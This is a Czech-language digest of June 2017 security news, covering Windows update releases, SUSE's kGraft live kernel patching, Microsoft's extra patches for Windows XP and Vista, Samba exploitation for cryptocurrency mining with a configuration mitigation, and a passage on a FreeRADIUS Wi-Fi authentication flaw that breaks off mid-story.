Opravné balíčky vyšly také pro Windows 8.1 a7, kde jsou ale přímo označeny tak, aby bylo jasné, že jde o předběžné verze. Jejich instalace je ryze nepovinná. Pokud si uvedené aktualizace nenainstalujete (ve Windows 10 vám vůbec nebudou nabídnuty), viz tip na straně, obdržíte tyto opravy spolu se záplatami nejdříve 12. července.

Aktualizujte svůj Windows 10
Ačkoli byly aktualizace uvolněny včera, muselo se jednat o naše pozdní večerní hodiny, neboť pár minut po jednadvacáté hodině mi Windows Update žádné novinky nehlásil. Oproti zmíněnému záplatovacímu úterý ovšem tentokrát nejde o aktualizace, které by přinášely záplaty děr. Následující opravné balíčky pouze zlepšují stabilitu operačního systému, tedy řeší objevené chyby. Situaci nové aktualizace mění následovně:

Tip: Pokud jste službu Windows Update nastavili tak, aby odkládala instalaci nových funkcí, pak vám Windows Update žádnou z těchto nových aktualizací nenabídne. Tato možnost je dostupná jen v edici Pro a vyšších.
aktualizace KB4022716 pro Windows 10 v1703 zvedá číslo sestavení na 15063.447,
aktualizace KB4022723 pro Windows 10 v1607 zvedá číslo sestavení na 14393.1378,
aktualizace KB4032693 pro Windows 10 v1511 zvedá číslo sestavení na 10586.965,
aktualizace KB4032695 pro Windows 10 v1507 zvedá číslo sestavení na 10240.17446.
Seznam oprav pro verzi 1703 je dlouhatánský, mnoho problémů nicméně bylo opraveno také ve verzi 1607. Dvě nejstarší verze Desítek pak dostávají každá po třech opravách.

Záplatování jádra za běhu: kGraft to zvládne bez výpadku
26.6.2017 Root.cz Vulnerebility
Linuxový server se musí kvůli software restartovat v jediném případě: když je potřeba vyměnit jádro. S technologií kGraft už ale nutně neplatí ani to. Dokáže za plného provozu vyměnit jednu funkci za druhou.
Živé záplatování jádra umožňuje zjednodušit správu velkých serverů a opravit nejvážnější problémy za běhu, říká Jiří Kosina z pražské pobočky společnosti SUSE. Máme tu velkou skupinu jaderných vývojářů, kteří se zabývají ovladači, plánovačem a podobně, řekl na začátku při představování Jiří Kosina. Nejnovější věc, na které tu teď pracujeme, je patchování linuxového jádra za běhu. Často se prý lidé vývojářů ptají, k čemu je něco takového vůbec potřeba, když reboot nic nestojí. Děláme to hlavně proto, protože to po nás chtěli zákazníci. Reboot celého datacentra taky není zadarmo, stojí to obrovské náklady.

Velká datacentra mají přesně naplánované údržbové cykly, většinou v řádech měsíců. Každý neočekávaný restart systémů přináší další náklady. Když přijde bezpečnostní problém nebo se objeví problém se stabilitou, který by jim to mohl shodit, je pro ně hodně drahé operativně naplánovat restart celého datacentra. Firmy proto chtějí mít možnost zabezpečit jádro okamžitě a pak mají čas v bezpečném stavu počkat do dalšího okna pro plánovanou údržbu.
Tohle je ovšem jen nepřímý důsledek toho, že nabootovat enterprise server může trvat třeba tři čtvrtě hodiny. Když máte šestnáct terabajtů RAM, bude jen její inicializace biosem trvat klidně čtyřicet minut. I z tohoto důvodu se to nedá udělat rychleji, vždycky vás to bude stát čas, během kterého server nepracuje, vysvětlil Kosina.

kGraft nepotřebuje přestávku
Vývojáři SUSE vytvořili pro záplatování za běhu vlastní technologii kGraft, kterou už komerčně nabízejí a zákazníci ji mají reálně nasazenou. Trochu jsme tu porušili naši běžnou filosofii, kdy obvykle nejprve všechno posíláme do upstreamu Linusovi. kGraft je ale hodně nová věc, která je poměrně rozsáhlá. Nejprve jsme chtěli mít nějaká reálná nasazení a uživatele a teď to celé po kouskách posíláme do jádra. V podstatě jsme s tím hotovi. Ve zdrojových souborech jádra je už volba CONFIG_LIVEPATCH, která zapíná patřičné API pro aktualizaci funkcí jádra za běhu.
Příklad serveru, který nechcete restartovat
Patch pro živé záplatování jádra má zvláštní formát a SUSE v této formě neposkytuje zdaleka všechny záplaty. Není to možné, protože to není v našich silách, je to hromada ruční práce. Proto se záplaty omezují na bezpečnostní problémy, chyby způsobující nestabilitu nebo potenciálně poškozující data. Pokud tedy víme, že v jádře je chyba umožňující získat roota nebo je někdo schopen úmyslně poškodit data, vytvoříme live patch. V této formě se tak například nedistribuují nové ovladače pro hardware.

Vývojáře prý na začátku překvapilo, že jádro nebylo nutné nijak zvlášť upravovat. Vytvořili jsme celou novou infrastrukturu, ale do stávajících kódů jsme zasahovali poměrně málo. Později se objevily okrajové případy, kdy bylo potřeba upravovat zdrojové kódy více. Například záplatování plánovače je velmi zajímavé, nebo jsme doplnili možnost opravy samotného kGraft. Taky je to hodně komplikované, ale jde to.

Výhodou kGraft je fakt, že se jádro během záplatování vůbec nezastaví. Možná jste slyšeli o Ksplice, který ale funguje jinak. Pošle všem procesorům přerušení, všechny se sejdou v nekonečné smyčce, pak se vymění jádro a zase se spustí. Nedojde sice k restartování systému, ale je tam potenciál pro výpadek v řádu stovek milisekund, kdy jádro nemůže vůbec nic dělat. My jsme zvolili jiný přístup, kdy se činnost jádra vůbec nezastaví a kód se postupně přesune do nového stavu.

Existuje také ještě varianta zvaná Kexec, která ale dělá ve skutečnosti něco jiného – nechá nabootovat nové jádro místo starého. Ušetříte tím sice čas inicializace hardware, ale popadají vám všechny procesy, soubory i TCP spojení. Měníte prostě celé jádro se vším všudy.

Příprava je nutná
Jak tedy provést živou úpravu kódu tak, aby se nic nerozbilo? Používáme tam několik zajímavých triků. Celé jádro je zkompilované pomocí GCC s parametrem -pg, který vytvoří profilovací kód. Na začátek každé funkce překladač přidá skok do profilovací funkce, od které se očekává, že bude měřit, kolikrát se daná funkce použila, jak dlouho trval její běh a podobně. V jádře se ale tato vlastnost nepoužívá, takže vývojáři využijí přidané volání a „ukradnou si ho“ pro sebe. Na tohle místo jsme schopni v případě potřeby přidat přesměrování na opravenou verzi funkce, popisuje základní princip Kosina.
Při startu jádra se pak všechna přidaná volání upraví tak, že obsahují jen instrukci NOP . Ta nic nedělá (NOP = no operation) a jádro běží normálním způsobem. Všechny jaderné funkce mají na začátku pět bajtů, které se ale při provádění přeskočí a nijak běh neovlivňují. Takto připravené místo je pak možné kdykoliv později použít pro vložení instrukceJUMP následované adresou nové funkce. Tímhle trikem přesměrujeme jádro na jinou funkci a zbytek té původní už se pak nikdy neprovede.

V současné době je záplatování za běhu podporováno na platformě x86, pracuje se také na S/390, PowerPC a ARM64. Přidávat další architektury není problém, většina kódu je společná, musíme jen naučit GCC přidávat správně prology funkcí a to je vlastně všechno.

Upravujeme jádro za plného provozu
Jak pak probíhá samotné přesměrování? Zásadní je, že změna musí být atomická a nikdy nesmí dojít k tomu, že by byla funkce rozbitá. V každou chvíli totiž může být jádrem zavolána a musí proběhnout bez zastavení a podle očekávání. Prolog funkce musí mít pět bajtů (instrukce JUMP plus adresa), ale platforma x86 dovoluje atomicky vyměnit pouze čtyři bajty. My se ale nesmíme dostat do situace, kdy máme už čtyři bajty vyměněné a pátý ještě ne a jádro nám do takto rozpracované funkce skočí.

Proto se použije další zajímavý trik, který umožňuje chytře atomicky vyměnit všechny bajty „najednou“. Když chceme začít záplatovat, naplníme si připravené místo pěti jednobajtovými instrukcemi INT 3, což je softwarový breakpoint. Pokud by v kteroukoliv chvíli procesor chtěl funkci vykonávat, narazí na začátku na instrukce NOP nebo INT 3. Breakpoint v tomto případě zpracovává samo jádro, které ví o probíhajícím záplatování a proto rovnou skočí zpět za pětibajtový prolog. Chováme se k tomu tedy tak, jako by tam žádný breakpoint nebyl, a funkce normálně proběhne.

Postupná výměna adresy v prologu
Pět breakpointů je postupně odzadu vyměněno za adresu nové funkce. V jakoukoliv chvíli je před adresou stále alespoň jeden breakpoint, takže přepis může trvat libovolně dlouho a funkce je stále vykonavatelná v původní podobě. Teprve až v posledním kroku nahradíme první breakpoint instrukcí JUMP a tím dokončíme přesměrování ze staré podoby funkce na novou. Při tomto postupu mají vývojáři vždy jistotu, že procesor nenarazí na nekonzistentní data, na kterých by havaroval.

Upravená funkce tak nakonec začíná skokem do kódu kGraft, který se musí rozhodnout, kam bude skok pokračovat. O zmíněných pět bajtů se dělíme ještě s funkcí ftrace, která dovoluje jádru zapínat různé mechanismy pro sledování chování jednotlivých funkcí. Proto musí být mezi novou a starou podobu funkce vložena logika, která rozhoduje, co bude po skoku následovat. Pokud je to náš skok kvůli upravené funkci, následuje další skok na novou podobu, která opět začíná pěti nepoužívanými bajty. To pro případ, kdy by bylo nutné někdy později funkci znovu opravit. Je možné buď znovu zasáhnout do volání původní funkce nebo jednotlivé skoky řetězit.

Průběh funkce před a po opravě
Jeden modul vládne všem
Jádro je možné záplatovat po jednotlivých funkcích, ale z praktických důvodů se zákazníkům distribuuje vždy jedna velká kumulativní záplata ve formě běžného modulu .ko. Ten poslední vždycky obsahuje všechno, takže s poslední verzí vždycky měníme všechny už záplatované funkce. Vůbec to nevadí, protože doba záplatování podle Kosiny nezávisí na tom, kolik funkcí se upravuje. Jedna velká úprava je pro nás výhodnější, protože vždycky víme, v jakém stavu se systém nachází. V opačném případě by si uživatel náhodně aplikoval různé změny a množiny záplat a my bychom nebyli schopni takový systém podporovat.

Tvorba záplaty je z velké části ruční prací, což má podle Jiřího Kosiny výhodu zejména v tom, že vývojář může skutečně celý kód projít a zkontrolovat. Většinou je to celá skupina funkcí, protože se většinou ukáže, že kvůli jedné chybě je toho potřeba vyměnit víc. Problém je, že tyto funkce jsou na sobě závislé a je potřeba opět udržet konzistenci. Může se stát, že nová verze funkce má jiný počet parametrů, což se musí zohlednit i v ostatních funkcích. Musí se tedy vždy zajistit, že se mezi sebou nemíchají různé generace funkcí. Stará volá starou nebo už nová novou, nikdy ne křížem.

Jádro tedy navíc hlídá, v jakém stavu je rozpracované záplatování a pouští jednotlivé procesy vstupující do jádra buď starou cestou nebo už novou. Říkáme tomu, že hlídáme, v jakém vesmíru ten daný proces je. Jestli je ve starém nebo už v novém. Podle tohohle kontextu ho pak na rozhraní uživatelského a jaderného prostoru pouštíme do správných funkcí. Postupně se tedy jednotlivé procesy označují podle toho, zda už jejich funkce byly záplatovány nebo ne. Až jsou všechny procesy označené, můžeme prohlásit, že záplatování jádra skončilo a vše už běží na novém kódu. Jádro tak vlastně postupně „dopluje“ do migrovaného stavu.

Rozhodování na vstupu do jádra
Tento proces zatím ovšem neumí upravovat datové struktury v jádře. Umíme jen vyměnit kód, ale nedokážeme to ve chvíli, kdy se zároveň mění data. Museli bychom vyhledat všechny instance těchto dat v paměti, což není možné, a zároveň všechen kód, který s nimi pracuje. Naštěstí se to u bezpečnostních záplat nestává příliš často. Za rok a půl jsme dělali několik stovek záplat a stalo se nám jednou, že jsme museli zasahovat do dat. Podle Kosiny má ale i tohle několik způsobů řešení a vývojáři nich pracují. Není to velký problém, ale chtěli bychom ho do budoucna vyřešit.

Oprava za jízdy
Výhodou technologie kGraft je, že skutečně ani na okamžik nezastavuje činnost opravovaného serveru. Nevýhodou je, že záplaty je nutné vytvářet ručně. Podle Kosiny to ale v praxi není problém, protože to v SUSE zvládá jediný vývojář. Nejsložitější je obvykle pochopit, co daná úprava dělá, což nemusí být triviální. Ale daří se nám vydávat opravy ve stejnou chvíli, kdy je distribuujeme ve standardní podobě. Uživatelé si tak mohou vybrat. Vývojáři zároveň podporují až dvacet různých verzí jádra v různých produktech. Uživatelé nechtějí restartovat servery, takže jim nemůžeme říct, že podporujeme jen nejnovější jádro a oni mají restartovat a vyměnit si ho.

S během záplatovaných funkcí je samozřejmě spojena také nějaká režie. Je to několik instrukcí na funkci navíc, což může být hodně, ale také nemusí. Pokud se funkce volá velmi sporadicky, nemá její záplata na výkon systému žádný vliv. Pokud se ale naopak používá velmi často, začne se zdržení projevovat. Dokud ale není funkce nijak záplatovaná, její úprava se nijak neprojevuje. Jen zabírá v paměti o pět bajtů více, takže jádro je mírně nabobtnalé.

Celkem prý vývojáři v SUSE za rok a půl vydali téměř tisíc takových záplat. Jejich množství ale rozhodně není stabilní, někdy se neděje nic a pak někdo objeví chybu a ostatní se na ni vrhnou a objeví hromadu dalších.

Nebezpečné chyby ohrožují uživatele Windows XP i Vista

19.6.2017 Novinky/Bezpečnost Zranitelnosti
Společnost Microsoft ukončila v letošním roce podporu pro operační systém Windows Vista, podobně jako tomu bylo před lety v případě populárních xpéček. Ani pro jeden systém tak už neměly vycházet aktualizace. Kvůli nově objeveným nebezpečným chybám se však americký softwarový gigant rozhodl udělat výjimku a opravy „Nové aktualizace Windows opravují chybu v zabezpečení umožňující vzdálenému útočníkovi spustit na cílovém počítači libovolný kód,“ varoval Pavel Bašta, analytik Národního bezpečnostního týmu CSIRT.CZ.

To jinými slovy znamená, že na napadený stroj mohou kyberzločinci propašovat prakticky jakýkoli virus. Uživatel o tom nemusí vůbec vědět.

Právě závažnost nově objevených trhlin je patrně jedním z hlavních důvodů, proč se americký softwarový gigant rozhodl vydat aktualizace i pro již nepodporované systémy. Vedle Windows XP je řeč také o Vistách, pro které podpora skončila už letos v dubnu.

Pro Windows XP vydal Microsoft mimochodem aktualizaci už letos v květnu. Tehdy kvůli škodlivému kódu WannaCry, jež se začal internetem šířit doslova jako lavina. Za pouhých pár dní napadl přes 300 000 počítačů ve více než 150 zemích světa. [celá zpráva]

S ohledem na možná rizika by uživatelé neměli s instalací aktualizací otálet. Stahovat opravy je možné prostřednictvím služby Windows Update, která je součástí operačního systému Windows.

Podpora skončila, systém nikoliv
Ukončení podpory ze strany Microsoftu neznamená, že by operační systém přestal ze dne na den fungovat. S trochou nadsázky se dá říci, že Windows XP i Visty jsou nesmrtelné. Pokud o to uživatelé budou stát, mohou na počítačích fungovat klidně další desítky let.

Microsoft samotnou funkčnost nijak neomezil, vše funguje jako před ukončením podpory. Problém však představuje absence bezpečnostních záplat. Riziko nákazy počítačovým virem je ale například u xpéček až šestkrát vyšší než u osmiček a ještě mnohonásobně vyšší než u aktuálně nabízených desítek.

Vhodným řešením je tak z bezpečnostního hlediska přechod na novější systém. Vybírat uživatelé přitom nemusejí pouze ze stáje Windows – k dispozici mají i řadu bezplatných alternativ.

Microsoft opět vydal záplatu pro Windows XP. Je to chyba, XPčka patří do koše
15.6.2017 Živě.cz Zranitelnosti
Rozšířená podpora Windows XP skončila už před třemi lety
A Microsoft od té doby vydal už několik klíčových záplat
Tím zdánlivě prodlužuje životnost XP a to je chyba
Windows XP, prostředí Luna a tapeta BlissBSOD: Jedna z nejméně oblíbených funkcí Windows XPLegendární tapeta Bliss z Windows XPWindows XP a prohlížečAlternativní nabídka Start is back a téma Windows XP na Windows 1021 FOTOGRAFIÍ
8. dubna 2014 dorazila na Windows XP poslední várka záplat a legendární, nicméně už tehdy přes všechny servisní balíčky notně zastaralý, systém se konečně odporoučel alespoň do formálních věčných lovišť.

Ne, tak tomu bohužel nebylo. To už teď víme všichni.

Tak skončila podpora Windows XP, nebo ne?

Na sklonku dubna totiž postrašila komunitu kritická chyba napříč tehdejšími verzemi Internet Exploreru, a Microsoft tak nakonec porušil pravidlo a hned první květnový den vydal záplatu i pro Windows XP. Stalo se tak poprvé v jeho historii, kdy se věnoval operačnímu systému po definitivním konci jeho podpory. Domnívám se, že to byla chyba, která jen zpomalila přechod domácích uživatelů i firem na novější verzi Windows, mnozí totiž nabyli dojmu, že když se objeví nějaký další průšvih, Microsoft jej chtě nechtě stejně zase opraví.

Klepněte pro větší obrázek
Windows XP patří na staré počítače z doby předfacebookové a ne na ty současné a připojené k internetu

Jedna záplata přitom neřeší problém starého operačního systému jako takového, což potvrdila na podzim téhož roku analýza AVG, podle které patřily XPčka k nejnakažlivějším tržně-relevantním systémům té doby. Patrně je tomu dodnes.

Adrienne Hallová z Microsoftu v každém případě hned po vydání záplaty pro Windows XP v blogu upozorňovala uživatele, že se jedná o naprostou výjimku a firma se rozhodla opravit IE pro XPčka pouze z toho důvodu, že jejich podpora skončila teprve před pár týdny.

Bude se to opakovat i u Windows 7?

Již brzy bude Microsoft řešit stejná dilemata i v souvislosti s Windows 7, pomalu se totiž blíží i konec jejich rozšířené podpory. Ta základní skončila dokonce už před dvěma lety. Stárnutí Windows 7 jsme se věnovali v naší diskuzi.
Po třech letech zasáhl svět WannaCry a Microsoft opět porušil vlastní pravidla hry

Následující tři roky uplynuly jako voda, základna uživatelů Windows XP pozvolna klesla na 5,7 % (NetMarketShare, květen 2017) a v Česku dokonce až na 4,1 % (Rankings, květen 2017), načež počítačový svět v plné síle zasáhla aféra ransomwaru WannaCry, jehož autoři zneužili zranitelnost, která unikla z americké Bezpečnostní agentury NSA.

Ačkoliv se mělo za to, že WannaCry největší silou zasáhne právě XPčka, ta byla nakonec natolik technologicky zastaralá, že po spuštění malwaru často havarovala a namísto zašifrování souborů se naštěstí zobrazil BSOD – modrá obrazovka smrti, která mnohé zachránila. Ach ty počítačové paradoxy.

I z tohoto důvodu nakonec vládly žebříčkům nejpostiženějších systémů Windows 7. I to je paradoxní, oprava, která by zamezila masivnímu šíření WannaCry právě na Sedmičkách totiž byla k dispozici už nějaký měsíc.

Microsoft nicméně opět porušil pravidlo a vydal speciální bugfix pro Windows XP, jenž měl zalátat díry, kterými se do systému hodlal dostat právě WannaCry. I tentokrát redmondští manažeři hájili krok jako naprosto výjimečný, který odpovídal závažnosti problému.

Jak však píše Peter Bright z Ars Techniky: „There will always be one more emergency.“ Jinými slovy, XPčka nebudou nikdy dostatečně zabezpečená a stejně tak nehrozí, že bychom se snad měli v dohledné době dočkat okamžiku, kdy útočníci všeho druhu přestanou psát malware. Dělají to přeci posledních třicet let a jejich aktivita je přímo úměrná velikosti globálního počítačového ekosystému počínaje vašim mobilním telefonem a konče třeba superpočítačem NASA Pleiades v Mountain View.

Měsíc poté Microsoft opět opravuje XPčka a paradoxně tak prodlužuje jejich životnost

A skutečně, měsíc po útoku WannaCry Microsoft v rámci svého Patch Tuesday opět udělal výjimku, ze které se už pomalu stává samozřejmost, a opět vydal záplaty pro Windows XP a další již nepodporované verze; třeba Server 2003. Je jich celá hromada, na rozdíl od automatického aktualizačního systému je musí případní majitelé těchto muzejních softwarů nainstalovat ručně a mají opravit další související zranitelnosti, kterých by mohly zneužít v rámci kybernetického boje a špionáže nejrůznější státní agentury (Microsoft zjevně míří na Rusko a Čínu).

Klepněte pro větší obrázek
Aby byly podniky lépe chráněné třeba proti kybernetické špionáži, Microsoft jim vydal záplatu pro tři roky nepodporovaný operační systém. To není zrovna nelichotivější vizitka pro zainteresované firmy a možná i státní úřady.

Ano, obrana před potenciální průmyslovou špionáží a útoky ze strany Ruska a Číny je pro americké podniky klíčová – ostatně mnozí se domnívají, že i stopy v případě WannaCry směřují na východ –, ale možná by bylo mnohem lepší ochranou, než vydávat záplaty na 16 let starý operační systém (!), prostě sakra konečně přejít na nový.

Ačkoliv je totiž globální podíl Windows XP zdánlivě zanedbatelný, faktem zůstává, že i nadále přežívá v nejednom podniku, čímž si ostatně vydání opravdu, ale opravdu výjimečného bugfixu ospravedlňuje i Microsoft.

Začarovaný kruh

A tak tu máme začarovaný kruh. Mnohé firmy se stále nezbavují Windows XP, protože když bude nejhůře, Redmond tu záplatu prostě vydá a basta. A Redmond tu záplatu nakonec opravdu uvolní, protože některé podniky nejsou schopny, nebo ochotny ani tři roky po ukončení rozšířené podpory Windows XP přejít na modernější alternativu – ať už je jakákoliv. Tímto přístupem přitom zvyšují riziko na celém internetu.

Zároveň, jak už bylo řečeno, oprava jednoho problému nikterak nezvyšuje bezpečnost Windows XP jako celku. XPéčka jsou děravá a zastaralá už z principu. Mít nějaká v naší brněnské podnikové síti, útočil bych na ně z dlouhé chvíle s Kali na USB klíčence i já.

Bizarní cirkus pokračuje. Microsoft nabízí další záplaty i pro Windows XP a Vista

14.6.017 CNEWS.cz Zranitelnosti
„Žádné další záplaty pro Windows XP nevydáme“. Tak určitě.

Červnové záplatovací úterý není tak výjimečné jako dubnové, které nabídlo oficiálně poslední záplaty pro Windows Vista a současně zahájilo širokou distribuci nové hlavní verze Desítek.

Je ale výjimečné tím, že opět nabízí aktualizace pro nepodporované verze Windows, tj. zejména XP a Vista. K výjimečnému vydání aktualizace pro Ikspéčka došlo podruhé v historii nedávno, a to v souvislosti s ransomwarem WannaCry.

Další mimořádné záplaty pro Windows XP a Vista

Včera uvolněné opravy jsou třetím případem mimořádné aktualizace vydané po skončení podpory Windows XP a druhé v případě Windows Vista. Microsoft tak učinil, protože zaznamenal konkrétní rizika spojená s organizacemi, které by mohly podlehnout kybernetickým útokům. Jako projev dobré vůle příslušné díry opravuje i ve dvou zmíněných nepodporovaných systémech (plus ve Windows 8 a Windows Server 2003), viz MSA 4025685.

Proč? Určitě se jedná o výbornou zákaznickou podporu. Možná si chce firma přihřát polívčičku po útoku obávaného WannaCry, který se stal mediálním trhákem. Stále však platí, co jsem už kdysi zmínil.

Komentář: Vyhýbáte se aktualizacím? Jste nezodpovědní a ohrožujete společnost

Z novinářů a novinářek, kteří seznamují uživatelstvo s tím, že by nepodporovaný systém nemělo používat a že žádné další aktualizace neobdrží, činí lháře a lhářky. Sám pak vystupuje jako pokrytec a shazuje rozhodnutí těch, kdo se kvůli bezpečnosti rozhodli přejít na podporované verze Windows. Navíc tím vytváří pocit falešného bezpečí – někdo si to může vyložit tak, že i nepodporovaný systém je zabezpečený.

Záplaty pro Ikspéčka nebo Vistu tak nejsou automaticky přínosem. Navíc si sám Microsoft stěžoval na organizace, které neaktualizují. Právě neaktualizované počítače byly hlavní příčinou, proč je WannaCry napadl. Navíc některé vládní organizace hledají díry v systémech a Microsoftu o nich neříkají, aby je sami mohly zneužívat. (Exploit využitý ransomwarem WannaCry pochází od NSA.) Vládám pak Microsoft na oplátku ošetří záplatami počítače s nepodporovanými systémy. Je to vlastně bizarní situace.

Souhrnné informace

Jinak můžete skrze Windows Update stáhnout nové aktualizace pro podporované verze Windows, záplat se dočkaly také kancelářské balíky Microsoft Office. Přehledné reporty o záplatách Microsoft zrušil, místo nich nabízí tyto méně přehledné a méně detailní přehledy, další informace pak naleznete v tomto přehledu. (Děkujeme, tohle přehlednosti rozhodně nepomohlo.) Celkem pro své softwarové produkty vydal Microsoft patnáct záplat.

Opravné balíčky formou kumulativních aktualizací neminuly ani Desítky, Osmičky a Sedmičky:

aktualizace KB4022725 pro Windows 10 v1703 zvedá číslo sestavení na 15063.413 či 15063.414,
aktualizace KB4022715 pro Windows 10 v1607 zvedá číslo sestavení na 14393.1358,
aktualizace KB4022714 pro Windows 10 v1511 zvedá číslo sestavení na 10586.962,
aktualizace KB4022727 pro Windows 10 v1507 zvedá číslo sestavení na 10240.17443,
aktualizace KB4022726 pro Windows 8.1 přináší všechny opravy,
aktualizace KB4022717 pro Windows 8.1 přináší jen záplaty,
aktualizace KB4022719 pro Windows 7 přináší všechny opravy,
aktualizace KB4022722 pro Windows 7 přináší jen záplaty.
Všechny aktualizace, které jsou pro vaše zařízení dostupné, získáte prostřednictvím služby Windows Update. Abych byl přesný, v novější verzích Windows může Office využívat vlastní aktualizační mechanismus.

V Linuxu byla objevena díra. V systému je už sedm let a hackeři ji teď aktivně využívají
12.6.2017 Živě.cz Zranitelnosti
Hackeři začali zneužívat zranitelnosti operačního systému Linux, která byla zveřejněna před pár týdny a týká se síťového řešení Samba. Zranitelné systémy přeměňují na těžební stroje generující kryptoměny. Bližší informace o hrozbě zveřejnil web Bleeping Computer.

Kritická zranitelnost v populárním síťovém řešení Samba byla odhalena na konci května, přičemž postihuje všechny verze od 3.5.0, která byla uvolněna už v roce 2010. Uvedená chyba umožňuje získání plné kontroly nad ohroženým počítačem nebo serverem.

Napadené systémy těží kryptoměnu

Vývojáři Samby už chybu opravili. Záplaty byly průběžně zveřejněny také pro různé linuxové distribuce a díru je možné zacelit dokonce jen jediným řádkem v konfiguračním souboru. Přesto jsou útočníci úspěšní a našli dostatek neopravených systémů, které jim teď vytvářejí zisk.

Bezpečnostní experti ze společnosti Kaspersky Lab zachytili krátce po zveřejnění detailů o zranitelnosti první útok, který ji dokázal úspěšně zneužít. V první fázi získali přístup do zranitelného linuxového systému, ve kterém experimentálně vytvořili textový soubor složený z osmi náhodných symbolů. Pokud byl pokus úspěšný, znamenalo to, že hackeři mají potřebné povolení a nic jim nestojí v cestě.

Následně proběhla samotná infekce složená z dvojice modulů. "CblRWuoCc.so" vytvořil komplexní zadní vrátka, které mimo jiné obsahují i software CPUminer určený pro generování kryptoměn.

"INAebsGB.so" je reverzní příkazový řádek poskytující vzdálený přístup k infikovanému systému. Prostřednictvím něj lze do počítače nainstalovat další malware, provádět jiné záškodnické aktivity nebo jen kontrolovat a měnit nastavení těžebního softwaru.

Jak vydělat šest tisíc za den

Jelikož je generování kryptoměn velmi náročné na výpočetní výkon, není překvapením, že různé organizované skupiny využívají množství zranitelných systémů právě pro tento účel. Za vše hovoří úvodní zisk autorů této kampaně. V době analýzy bylo na kontě útočníků celkově 98 XMR (alternativní kryptoměna, po přepočtu cca 125 tisíc korun), přičemž denní zisk činil cca 6 tisíc korun a stále průběžně stoupal.

Galerie - V Linuxu byla objevena díra. V systému je už sedm let a hackeři ji teď aktivně využívají – Živě.cz
Stav konta útočníků (zdroj: Kaspersky lab)

Zranitelnost byla opravena ve verzích 4.6.4, 4.5.10, 4.4.14 a v novějších. Pro verze 4.6.3, 4.5.9 a 4.4.13 byla uvolněna odpovídající záplata. Opravené verze zpřístupnili i tvůrci jednotlivých linuxových distribucí.

V případě, že nemůžete přejít na nejnovější verzi, respektive nainstalovat záplatu, stačí do konfiguračního souboru softwaru Samba (smb.conf) vložit následující řádek:

nt pipe support = no
Nakonec službu "smbd" restartujte a váš systém bude před uvedenou chybou chráněný.

Chyba ve FreeRADIUS umožňuje připojení k Wi-Fi bez hesla
12.6.2017 Root.cz Zranitelnosti
V dubnu se nám podařilo objevit zranitelnost v autentizačním serveru FreeRADIUS, která umožňuje připojovat se do sítě bez znalosti hesla. Některá zařízení zranitelnost nejspíše neúmyslně využívají pro své připojení do sítě.
Autentizace uživatelů v podnikových bezdrátových sítích
Nalezená zranitelnost se týká podnikových bezdrátových sítí, které pro ověřování používají metodu Protected Extensible Authentication Protocol (PEAP) či EAP-TTLS. Obě metody rozšiřují autentizační framework EAP, v obou se vytváří zašifrovaný TLS tunel. Údaje potřebné pro autentizaci uživatele se posílají uvnitř tohoto tunelu, většinou se kontroluje znalost hesla s využitím protokolu MS-CHAPv2. Studenti a učitelé z Vysoké školy ekonomické v Praze se takto ověřují v síti eduroam.

Ve frameworku EAP se používají následující pojmy:

supplicant (žadatel) – zařízení či příslušná část softwaru na zařízení, které se chce připojit do sítě,
authenticator (autentizátor) – přístupový bod (Access Point) či přepínač, ke kterému se zařízení připojuje,
authentication server (autentizační server) – aplikace, která povoluje či zamítá přístup do sítě. Při komunikaci mezi autentizátorem a serverem se obvykle používá protokol RADIUS, do kterého se zapouzdřují EAP zprávy.
Při autentizaci se zařízení (např. mobil) nejdříve připojí k nejbližšímu přístupovému bodu. Následuje zahájení EAP autentizace, kdy supplicant odešle vnější jméno a domluví se EAP protokol mezi zařízením a autentizačním serverem. Tato část komunikace není zašifrována a proto se jako vnější jméno někdy nastavuje anonymní identita.

Protokol PEAP definuje dvě fáze autentizace. V první se vytvoří šifrovaný tunel dle standardu TLS. Součástí je autentizace serveru, tj. kontrola jména a certifikátu serveru. Ve druhé fázi se ověřuje supplicant/zařízení. Posílá se reálné uživatelské jméno, pro ověření správného hesla se obvykle používá protokol MS-CHAPv2. Komunikace probíhá uvnitř vytvořeného TLS tunelu.

Po úspěšné autentizaci RADIUS server pošle autentizátoru zprávu Access-Accept, která obsahuje podklady k domluvení klíčů na zašifrování komunikace mezi zařízením a přístupovým bodem. Následuje tzv. 4-way handshake, který je popsán např. v článku „Odposlouchávání a prolamování Wi-Fi sítí zabezpečených pomocí WPA2“.

Ve schématu není vyjádřena EAP fragmentace – certifikáty serveru se nevejdou do jedné EAP zprávy a proto nutně dochází k rozdělení do více EAP zpráv a každá z nich se potvrzuje. Při úspěšné autentizaci si zařízení s našim RADIUS serverem vymění obvykle 11 zpráv.

Již od SSLv3 je součástí TLS podpora obnovení spojení (session resumption, viz RFC5246 sec 7.4.1.2). Nejdříve proběhne úplná TLS výměna a na jejím konci si obě strany uloží vygenerované session ID a bezpečnostní parametry včetně hlavního tajemství (master secret). Při vytváření následného spojení klient pošle session ID a pokud je platné, tak si obě strany obnoví uložený stav. Obnovení spojení výrazně zkracuje úvodní TLS výměnu, neboť není potřeba posílat certifikáty či se domlouvat na bezpečnostních parametrech.

V protokolu PEAP je definováno rychlé obnovení spojení (Fast Reconnect), které zahrnuje obnovení TLS spojení a též přeskočení autentizace a autorizace klienta ve druhé fázi. Při rychlém obnovení spojení obvykle postačuje vyměnit 4 zprávy s RADIUS serverem. Snižuje se i zatížení serveru, neboť nemusí ověřovat heslo vůči databázi či LDAP serveru.

Připojení protokolem EAP-TTLS má velmi podobný průběh. Pro rychlé obnovení spojení používá označení session resumption.

FreeRADIUS rychlé obnovení spojení podporuje od verze 2.1.x. Ve verzi 3.0.x je již povoleno ve výchozí konfiguraci. Údaje o sezení si ukládá do paměti či na disk, údaje jsou platné 24 hodin.

Odhalení zranitelnosti
Přibližně v polovině dubna jsme dokončili aplikaci, která uživatelům zobrazí logy z RADIUS serverů včetně přibližné lokalizace. Správci bezdrátové sítě si mohou zobrazit údaje pro jednotlivé účty či MAC adresy zařízení. Náš vedoucí začal aplikaci testovat a mimo jiné zadal vyhledání údajů za kolegu, který ten den nebyl v Praze. K našemu překvapení se vypsalo, že se ráno přibližně v 8:15 přihlásil do eduroam v budově na Žižkově. A poté znovu v době oběda.

Zavolali jsme mu a shodli se na tom, že někomu pomáhal nastavovat připojení do eduroam na mobilu. A protože dotyčný neznal své heslo, tak kolega použil své přístupové údaje. Po telefonátu si kolega změnil své heslo do eduroam a tím jsme problém považovali za vyřízený.

